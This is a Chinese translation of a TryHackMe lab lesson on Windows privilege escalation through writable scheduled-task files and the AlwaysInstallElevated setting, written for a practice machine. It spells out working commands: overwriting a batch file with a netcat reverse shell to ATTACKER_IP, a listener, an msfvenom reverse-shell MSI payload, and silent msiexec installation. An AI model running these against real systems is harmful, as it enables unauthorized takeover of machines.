【THM-课程内容】:Privilege Escalation-Windows Privilege Escalation: Other Quick Wins
特权升级并不总是一个挑战。一些配置错误可能允许您获得更高权限的用户访问权限,在某些情况下甚至可以获得管理员访问权限。如果您认为这些更属于CTF事件的范畴,而不是您在实际渗透测试中遇到的场景,那将有所帮助。然而,如果前面提到的方法都不起作用,你总是可以回到以下这些方法。
计划任务
查看目标系统上的计划任务,您可能会看到一个计划任务丢失了二进制文件,或者它正在使用您可以修改的二进制文件。
可以使用schtasks命令从命令行列出计划任务,而不需要任何选项。要检索有关任何服务的详细信息,您可以使用以下命令:
C:\> schtasks /query /tn vulntask /fo list /v Folder: \ HostName: THM-PC1 TaskName: \vulntask Task To Run: C:\tasks\schtask.bat Run As User: taskusr1您将获得有关任务的大量信息,但对我们来说重要的是“要运行的任务”参数,该参数指示计划任务执行的内容,以及“以用户身份运行”参数,它显示将用于执行任务的用户。
如果我们当前的用户可以修改或覆盖“要运行的任务”可执行文件,我们就可以控制taskusr1用户执行的内容,从而实现简单的权限升级。为了检查可执行文件的文件权限,我们使用icacls:
C:\> icacls c:\tasks\schtask.bat c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(F)从结果中可以看出,BUILTIN\Users组对任务的二进制文件具有完全访问权限(F)。这意味着我们可以修改.bat文件并插入任何我们喜欢的有效载荷。为了您的方便,可以在C:\tools上找到nc64.exe。让我们更改bat文件以生成一个反向shell:
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat然后,我们在攻击者机器上的反向shell上指示的同一端口上启动一个侦听器:
nc -lvp 4444下次运行计划任务时,您应该收到具有taskusr1权限的反向shell。虽然您可能无法在真实场景中启动任务,并且必须等待计划任务触发,但我们为您的用户提供了手动启动任务的权限,以节省您的一些时间。我们可以使用以下命令运行任务:
C:\> schtasks /run /tn vulntask您将收到具有taskusr1权限的反向shell,正如预期的那样:
user@attackerpc$ nc -lvp 4444 Listening on 0.0.0.0 4444 Connection received on 10.10.175.90 50649 Microsoft Windows [Version 10.0.17763.1821] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami wprivesc1\taskusr1转到taskusr1桌面以检索标志。别忘了在任务结束时输入标志。
AlwaysInstallElevated
Windows安装程序文件(也称为.msi文件)用于在系统上安装应用程序。它们通常以启动它的用户的权限级别运行。但是,这些可以配置为从任何用户帐户(甚至是无权限的帐户)以更高的权限运行。这可能会让我们生成一个以管理员权限运行的恶意MSI文件。
注意:AlwaysInstallElevated方法在此房间的机器上不起作用,它仅作为信息提供。
此方法需要设置两个注册表值。您可以使用以下命令从命令行查询这些。
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer为了能够利用此漏洞,两者都应该设置。否则,剥削是不可能的。如果设置了这些,您可以使用msfvenom生成恶意.msi文件,如下所示:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi由于这是一个反向shell,您还应该运行相应配置的Metasploit Handler模块。传输创建的文件后,您可以使用以下命令运行安装程序并接收反向shell:
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi